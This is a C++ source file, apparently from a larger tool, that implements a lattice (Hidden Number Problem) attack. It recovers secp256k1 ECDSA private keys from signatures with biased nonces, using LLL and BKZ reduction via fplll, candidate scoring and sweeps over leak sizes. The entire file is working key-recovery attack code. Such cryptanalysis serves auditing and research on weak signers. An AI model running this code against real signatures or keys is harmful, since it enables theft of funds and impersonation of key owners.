#include "lattice_solver.h"
#include "utils.h"
#include <fplll.h>
#include <iostream>
#include <cmath>
#include <vector>
#include <algorithm>

using namespace fplll;

// Hard ceiling on the lattice-training sample size (and therefore on
// dimension, since dim = train_m + 1). Exact big-integer LLL was measured
// to blow past any interactive time budget well before train_m=320 (needed
// for L=1) or even train_m=161 (L=2) -- see HANDOFF.md ("weak bias support
// -- blocked") for the timing data. Capping here means L=2 trials run at
// reduced margin (best-effort, not guaranteed to resolve) and L=1 is
// dropped from the default sweeps entirely below, rather than letting
// either eat the whole time budget for a near-certain failure.
constexpr size_t TRAIN_M_CAP = 120;

namespace {

// fplll's plain bkz_reduction(basis, block_size, flags) convenience call
// builds a BKZParam with an *empty* strategies vector -- fplll's own
// BKZParam constructor then defaults every block to Strategy::EmptyStrategy,
// whose PruningParams is documented in fplll's own source as "means no
// pruning": every block runs full, unpruned, exhaustive enumeration, the
// most expensive mode that exists. Measured directly against this project's
// own lattice construction: block_size=30 at dim~161 (the weak-bias case
// that motivated TRAIN_M_CAP above) never finished in 20 minutes unpruned;
// loading fplll's own bundled, pre-tuned pruning strategy -- the same one
// its command-line tool loads by default -- brought the identical instance
// down to ~18 seconds. That's two orders of magnitude at the *same*
// reduction strength, not a quality tradeoff, so there's no reason not to
// use it whenever it's available. Falls back to empty (old, slower but
// still correct, unpruned) behavior if none of these paths exist, rather
// than failing outright -- pruning is a speed optimization, not a
// correctness requirement.
std::vector<fplll::Strategy> load_bkz_pruning_strategies() {
    static const std::vector<std::string> candidates = {
        "/usr/local/share/fplll/strategies/default.json",
        "/usr/share/fplll/strategies/default.json",
        "/usr/share/libfplll8/strategies/default.json",
    };
    for (const auto& path : candidates) {
        try {
            return fplll::load_strategies_json(path);
        } catch (const std::exception&) {
            continue;
        }
    }
    return {};
}

} // namespace

// HNP lattice embedding via pivot elimination + Kannan CVP->SVP embedding.
//
// The relation for each signature is k_i = w_i + x_i*d (mod N), with the
// bias assumption 0 <= k_i < 2^(256 - leaked_bits) (leaked_bits = number of
// known/zero top bits). The previous version of this function tried to put
// d itself into the lattice (scaled by 2^leaked_bits on the diagonal and in
// the x-column). That does not work: d spans the *full* group order (~2^256)
// regardless of any nonce bias, so no scaling of the surrounding basis makes
// the vector containing d actually short -- empirically its norm came out
// the same order of magnitude as a trivial basis row (~N), so LLL/BKZ had no
// signal to latch onto no matter which leaked_bits value was supplied.
//
// This version never puts d in the lattice. Instead it eliminates d first:
// picking pairs[0] as a pivot, for i = 1..m-1 we have
//   k_i - x_i*d ≡ w_i  and  k_0 - x_0*d ≡ w_0   (mod N)
// Multiplying the first by x_0 and the second by x_i and subtracting cancels
// d entirely:
//   x_0*k_i - x_i*k_0 ≡ x_0*w_i - x_i*w_0  (mod N)
// Dividing through by x_0 (invertible mod N):
//   k_i ≡ a_i*k_0 + t_i  (mod N),   a_i = x_i*x_0^{-1},  t_i = w_i - a_i*w_0
//
// This is now a textbook single-hidden-number HNP instance in the *small*
// unknown k_0 (bounded by the same 2^(256-leaked_bits) as every other
// nonce), with a_i, t_i computable from public data alone. We embed it as a
// CVP instance (lattice generated by N*e_i rows, target vector (t_i)) and
// convert to SVP via a Kannan embedding row/column scaled by M ~ the
// expected residual size. A genuinely short reduced vector then reveals
// k_0 directly in one column, and d = (k_0 - w_0) * x_0^{-1} mod N follows
// from a single back-substitution -- no scanning of arbitrary matrix
// entries required.
//
// Lattice dimension: n = m-1 relations -> dim = n + 2 = m + 1
//   columns 0..n-1  : residual (k_i) dimensions
//   column  n       : k_0 dimension
//   column  n+1     : Kannan embedding dimension
bool LatticeSolver::build_boneh_venkatesan_basis(
    const std::vector<Pair>& pairs,
    int leaked_bits,
    ZZ_mat<mpz_t>& basis,
    mpz& scaling_factor
) {
    size_t m = pairs.size();
    if (m < 4) return false; // need a pivot + at least 3 relations to be meaningful

    mpz N = SECP256K1_N;
    const Pair& pivot = pairs[0];

    mpz x0inv = utils::mod_inverse(pivot.x, N);
    if (x0inv == 0) return false;

    size_t n = m - 1;
    int dim = static_cast<int>(n) + 2;
    basis.resize(dim, dim);

    for (int r = 0; r < dim; ++r)
        for (int c = 0; c < dim; ++c)
            mpz_set_ui(basis[r][c].get_data(), 0);

    std::vector<mpz> a(n), t(n);
    for (size_t idx = 0; idx < n; ++idx) {
        const Pair& p = pairs[idx + 1];
        a[idx] = utils::mod_mul(p.x, x0inv, N);
        mpz aw0 = utils::mod_mul(a[idx], pivot.w, N);
        mpz diff = (p.w - aw0) % N;
        if (diff < 0) diff += N;
        t[idx] = diff;
    }

    // Expected magnitude of the small unknowns (k_0, and the residuals
    // once correctly resolved): ~2^(256 - leaked_bits). Used purely to
    // scale the embedding dimension so LLL/BKZ can compare it fairly
    // against the N-sized dimensions; it does not need to be exact.
    int l_bound = std::max(8, std::min(252, 256 - leaked_bits));
    mpz M = mpz(1) << l_bound;
    scaling_factor = M;

    for (size_t r = 0; r < n; ++r) {
        mpz_set(basis[r][r].get_data(), N.get_mpz_t());
    }

    for (size_t c = 0; c < n; ++c) {
        mpz_set(basis[n][c].get_data(), a[c].get_mpz_t());
    }
    mpz_set_ui(basis[n][n].get_data(), 1);

    for (size_t c = 0; c < n; ++c) {
        mpz_set(basis[n + 1][c].get_data(), t[c].get_mpz_t());
    }
    mpz_set(basis[n + 1][n + 1].get_data(), M.get_mpz_t());

    return true;
}

std::optional<mpz> LatticeSolver::reduce_and_extract(
    ZZ_mat<mpz_t>& basis,
    const std::vector<Pair>& pairs_in,
    Telemetry* telemetry,
    int bkz_block_size
) {
    if (basis.get_rows() == 0) return std::nullopt;

    int dim = basis.get_rows();

    if (telemetry) {
        telemetry->lattice_dim = dim;
    }

    bool success;
    if (bkz_block_size > 0) {
        // BKZ escalation: strictly stronger reduction than plain LLL at
        // the same delta, at significantly higher cost (roughly
        // exponential in block size), used only when LLL's result
        // doesn't already look convincing -- see recover_private_key.
        // Uses fplll's bundled pruning strategy when available -- see
        // load_bkz_pruning_strategies() above for why that matters as much
        // as it does (measured ~100x+ speedup at the same block size).
        if (telemetry) telemetry->set_phase("Running BKZ reduction (block size " + std::to_string(bkz_block_size) + ")");
        auto strategies = load_bkz_pruning_strategies();
        int status;
        if (!strategies.empty()) {
            BKZParam param(bkz_block_size, strategies);
            status = bkz_reduction(&basis, nullptr, param);
        } else {
            status = bkz_reduction(basis, bkz_block_size, BKZ_DEFAULT);
        }
        success = (status == RED_SUCCESS);
    } else {
        if (telemetry) telemetry->set_phase("Running LLL reduction");
        ZZ_mat<mpz_t> u, u_inv;
        u.resize(0, 0);
        u_inv.resize(0, 0);
        Wrapper wrapper(basis, u, u_inv, 0.99, 0.51, LLL_DEFAULT);
        success = wrapper.lll();
    }

    if (!success) {
        if (telemetry) telemetry->set_error(bkz_block_size > 0 ? "BKZ reduction failed" : "LLL reduction failed");
        return std::nullopt;
    }

    if (telemetry) {
        telemetry->set_phase("Reduction complete, searching short vectors + PubKey test");
    }

    mpz N = SECP256K1_N;
    size_t m = pairs_in.size();
    if (m < 4) return std::nullopt;

    std::optional<mpz> best_d;

    // Embedding layout (see build_boneh_venkatesan_basis): n = m-1, column
    // index n (== m-1) holds the k_0 coefficient in every basis vector. A
    // genuinely short reduced row encodes k_0 there directly; d follows via
    // a single back-substitution against the pivot pair, d = (k_0 - w_0) *
    // x_0^{-1} mod N. We don't know the sign Kannan's embedding settles on,
    // so try both +value and -value for each row.
    size_t k0_col = m - 1;

    const Pair& pivot = pairs_in[0];
    mpz x0inv = utils::mod_inverse(pivot.x, N);
    if (x0inv == 0) return std::nullopt;

    std::vector<mpz> candidates;
    for (int row = 0; row < dim && candidates.size() < 60; ++row) {
        mpz raw;
        mpz_set(raw.get_mpz_t(), basis[row][k0_col].get_data());
        if (raw == 0) continue;

        for (int sign = 0; sign < 2; ++sign) {
            mpz k0 = sign == 0 ? raw : -raw;
            k0 %= N;
            if (k0 < 0) k0 += N;

            mpz d_cand = (k0 - pivot.w) % N;
            if (d_cand < 0) d_cand += N;
            d_cand = utils::mod_mul(d_cand, x0inv, N);

            if (d_cand <= 1 || d_cand >= N - 1) continue;
            bool dup = false;
            for (auto& c : candidates) if (c == d_cand) { dup = true; break; }
            if (!dup) candidates.push_back(d_cand);
        }
    }

    // Fallback: scan remaining cells too, in case useful structure landed
    // somewhere other than the dedicated k_0 column (cheap insurance).
    for (int row = 0; row < dim && candidates.size() < 90; ++row) {
        for (int col = 0; col < dim && candidates.size() < 90; ++col) {
            if (col == static_cast<int>(k0_col)) continue;
            mpz val;
            mpz_set(val.get_mpz_t(), basis[row][col].get_data());
            if (val == 0) continue;
            if (val < 0) val = -val;
            if (val >= N) val %= N;
            if (val <= 1 || val >= N - 1) continue;
            bool dup = false;
            for (auto& c : candidates) if (c == val) { dup = true; break; }
            if (!dup) candidates.push_back(val);
        }
    }

    // Simple heuristic: prefer candidates that make many k "small"
    mpz best_cand(0);
    int best_score = -1;

    for (auto& cand : candidates) {
        int score = 0;
        for (size_t i = 0; i < std::min<size_t>(pairs_in.size(), 12); ++i) {
            mpz xd = utils::mod_mul(pairs_in[i].x, cand, N);
            mpz k = utils::mod_add(pairs_in[i].w, xd, N);

            // Count how "small" the k is (number of leading zero bits)
            int lz = 0;
            mpz t = k;
            while (t > 0 && lz < 30) {
                if ((t & (mpz(1) << (255 - lz))) == 0) lz++;
                else break;
            }
            score += lz;
        }

        if (score > best_score) {
            best_score = score;
            best_cand = cand;
        }
    }

    if (best_cand > 1 && best_cand < N-1) {
        best_d = best_cand;
    }

    return best_d;
}

std::optional<mpz> LatticeSolver::recover_private_key(
    const std::vector<Pair>& pairs,
    const BiasProfile& bias,
    size_t max_signatures,
    Telemetry* telemetry
) {
    if (pairs.empty()) return std::nullopt;

    size_t use_count = pairs.size();
    if (max_signatures > 0) use_count = std::min(use_count, max_signatures);

    // Used only for scoring candidates against real data (independent of
    // any particular trial's lattice-training subsample, which is sized
    // per-L below since weak bias needs a much bigger lattice).
    size_t scoring_m = std::min(use_count, static_cast<size_t>(200));
    std::vector<Pair> used_pairs(pairs.begin(), pairs.begin() + scoring_m);

    double leaked = bias.estimated_leaked_bits;
    if (leaked < 1.0) leaked = 8.0;

    // Try a broad range of leak values, including very weak (1-2 bit)
    // hard-bound bias. Phase B's estimate is only a rough point estimate
    // -- sweep systematically around it rather than trusting it exactly.
    // L=1 is deliberately absent from the candidate list below: its true
    // requirement (train_m ~ 320, per the 320/L margin further down) is far
    // past TRAIN_M_CAP, so a capped-dimension trial has no realistic chance
    // of enough margin to resolve -- it would just spend budget on a
    // near-guaranteed failure. L=2 stays in (needs ~160, also past the cap)
    // as best-effort only; see HANDOFF.md for the full story.
    std::vector<int> leak_trials;
    int base_l = std::max(2, static_cast<int>(std::round(leaked)));
    for (int cand : {3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 18, 20, 22, 24, 2}) {
        leak_trials.push_back(cand);
    }
    leak_trials.push_back(base_l);
    leak_trials.push_back(base_l + 2);
    leak_trials.push_back(std::max(2, base_l - 2));

    mpz best_cand(0);
    int best_score = -1;
    bool is_lsb = (bias.type == BiasType::LSB);

    if (telemetry) {
        telemetry->total_attempts = leak_trials.size();
        telemetry->current_attempt = 0;
    }

    // Score a candidate against the *original* (untransformed) pairs using
    // a threshold derived from this trial's own leak value l -- shared by
    // both the LLL and (if needed) BKZ escalation passes below.
    auto score_candidate = [&](const mpz& cand, int l) -> int {
        int score = 0;
        if (is_lsb) {
            mpz mod = mpz(1) << l;
            for (size_t i = 0; i < std::min<size_t>(used_pairs.size(), 20); ++i) {
                mpz xd = utils::mod_mul(used_pairs[i].x, cand, SECP256K1_N);
                mpz k = utils::mod_add(used_pairs[i].w, xd, SECP256K1_N);
                mpz r = k % mod;
                if (r == 0) score += 3;
                else if (r < (mod >> 2)) score += 1;
            }
        } else {
            int est = std::max(3, l);
            mpz thresh = mpz(1) << (256 - est);
            for (size_t i = 0; i < std::min<size_t>(used_pairs.size(), 20); ++i) {
                mpz xd = utils::mod_mul(used_pairs[i].x, cand, SECP256K1_N);
                mpz k = utils::mod_add(used_pairs[i].w, xd, SECP256K1_N);
                if (k < thresh) score += 3;
                if (k < (thresh >> 1)) score += 2;
            }
        }
        return score;
    };
    int max_possible_score = static_cast<int>(std::min<size_t>(used_pairs.size(), 20)) * (is_lsb ? 3 : 5);

    int best_partial_l = 0;
    int best_partial_score = -1;

    for (int l : leak_trials) {
        if (telemetry && telemetry->deadline_exceeded()) break;
        if (telemetry) telemetry->current_attempt = telemetry->current_attempt.load() + 1;
        l = std::max(2, std::min(l, 24));

        // Each L needs roughly 320/L signatures for adequate margin; weak
        // bias (L=2) needs a much bigger lattice than the L>=3 range this
        // was originally tuned for. Sized per-trial so cheap trials stay
        // cheap -- only the weak ones pay the larger-dimension cost, up to
        // TRAIN_M_CAP (see its definition for why the cap exists).
        size_t train_m = std::min({use_count, TRAIN_M_CAP,
                          std::max<size_t>(80, static_cast<size_t>(std::ceil(320.0 / l)))});

        // A single large-dimension LLL reduction can itself take minutes
        // even at the capped dimension, and there's no way to interrupt
        // fplll mid-call -- so skip *starting* a trial whose dimension
        // suggests it won't fit what's left, rather than launching it and
        // blowing past the deadline uncontrollably.
        if (telemetry) {
            double remaining = telemetry->remaining_budget_seconds();
            if (train_m > 100 && remaining < 60.0) continue;
        }

        std::vector<Pair> train_pairs(pairs.begin(), pairs.begin() + train_m);

        // For LSB bias, transform the pairs by 2^-l mod N before handing
        // them to the (bias-shape-agnostic) MSB lattice machinery -- see
        // utils::transform_pairs_lsb for why this is exact, not approximate.
        std::vector<Pair> trial_pairs = is_lsb ? utils::transform_pairs_lsb(train_pairs, l) : train_pairs;

        ZZ_mat<mpz_t> basis;
        mpz scaling;
        if (!build_boneh_venkatesan_basis(trial_pairs, l, basis, scaling)) {
            continue;
        }

        if (telemetry) {
            telemetry->signatures_used = train_pairs.size();
            telemetry->lattice_in_progress = true;
            telemetry->set_phase(std::string(is_lsb ? "Reducing LSB lattice (LLL) b=" : "Reducing lattice (LLL) l=") + std::to_string(l));
        }

        auto cand = reduce_and_extract(basis, trial_pairs, telemetry);

        if (telemetry) {
            telemetry->lattice_in_progress = false;
        }

        if (cand.has_value() && *cand > 1 && *cand < SECP256K1_N - 1) {
            int score = score_candidate(*cand, l);
            if (score > best_score) {
                best_score = score;
                best_cand = *cand;
            }
            // Track whichever L showed the strongest *partial* (but not
            // fully convincing) signal, as the single best candidate for
            // a BKZ retry below if the LLL sweep as a whole falls short.
            if (score > 0 && score < max_possible_score && score > best_partial_score) {
                best_partial_score = score;
                best_partial_l = l;
            }
        }

        // A fully convincing candidate is already overwhelming evidence
        // of correctness -- stop here rather than continuing through the
        // remaining trials, some of which (very weak bias, L=1,2) use a
        // much larger, slower lattice and would otherwise run regardless
        // of having already succeeded.
        if (best_score >= max_possible_score && max_possible_score > 0) {
            break;
        }
    }

    // BKZ escalation: bounded to at most ONE extra reduction, run only if
    // the full LLL sweep above didn't already produce a convincing result
    // (a clean maximal score is already overwhelming evidence of
    // correctness, so there's nothing for a stronger reduction to
    // improve on). Targets whichever L showed the strongest partial
    // signal during the sweep -- the case LLL's precision was most
    // plausibly just short of resolving -- rather than retrying every
    // unresolved trial, which would multiply runtime across the whole
    // sweep instead of a single targeted retry.
    bool sweep_convincing = (best_score >= max_possible_score && max_possible_score > 0);
    if (!sweep_convincing && best_partial_l > 0 && telemetry && !telemetry->deadline_exceeded()) {
        size_t bkz_train_m = std::min({use_count, TRAIN_M_CAP,
                              std::max<size_t>(80, static_cast<size_t>(std::ceil(320.0 / best_partial_l)))});
        std::vector<Pair> bkz_train_pairs(pairs.begin(), pairs.begin() + bkz_train_m);
        std::vector<Pair> trial_pairs = is_lsb ? utils::transform_pairs_lsb(bkz_train_pairs, best_partial_l) : bkz_train_pairs;

        ZZ_mat<mpz_t> basis_bkz;
        mpz scaling_bkz;
        if (build_boneh_venkatesan_basis(trial_pairs, best_partial_l, basis_bkz, scaling_bkz)) {
            int dim = basis_bkz.get_rows();
            // Half the dimension, capped at a practical ceiling -- BKZ
            // cost grows steeply with block size well before that
            // ceiling matters for the dimensions used here (~20-90).
            int block_size = std::max(10, std::min(dim / 2, 30));
            block_size = std::min(block_size, dim - 1);

            // BKZ cost explodes with block size far faster than LLL scales
            // with dimension. This was originally measured *before*
            // reduce_and_extract loaded fplll's pruning strategy (see
            // load_bkz_pruning_strategies() above): block_size 30 at
            // dim~101 didn't finish in 120s unpruned, and a real recovery
            // run hit ~85 minutes -- with --max-time given as only 180s.
            // With pruning now enabled, the *same* block_size=30 at
            // dim~121 (the largest this branch ever builds, since
            // bkz_train_m is capped at TRAIN_M_CAP) measures ~11s, and
            // block_size 12-24 all measure under 8s. Thresholds below are
            // re-measured post-pruning with several x margin, not reused
            // from the pre-pruning numbers -- those would now make this
            // guard skip escalations that actually run in seconds. As with
            // the LLL sweep's guard, this only stops *starting* an
            // escalation that clearly won't fit -- fplll still can't be
            // interrupted once a call is in flight.
            double bkz_budget_needed =
                block_size >= 25 ? 60.0 :
                block_size >= 21 ? 45.0 :
                block_size >= 17 ? 30.0 : 20.0;

            if (telemetry->remaining_budget_seconds() >= bkz_budget_needed) {
                telemetry->lattice_in_progress = true;
                telemetry->set_phase(std::string(is_lsb ? "Escalating to BKZ b=" : "Escalating to BKZ l=") + std::to_string(best_partial_l));

                auto cand_bkz = reduce_and_extract(basis_bkz, trial_pairs, telemetry, block_size);
                telemetry->lattice_in_progress = false;

                if (cand_bkz.has_value() && *cand_bkz > 1 && *cand_bkz < SECP256K1_N - 1) {
                    int score_bkz = score_candidate(*cand_bkz, best_partial_l);
                    if (score_bkz > best_score) {
                        best_score = score_bkz;
                        best_cand = *cand_bkz;
                    }
                }
            }
        }
    }

    if (best_cand > 1 && best_cand < SECP256K1_N - 1) {
        return best_cand;
    }

    return std::nullopt;
}
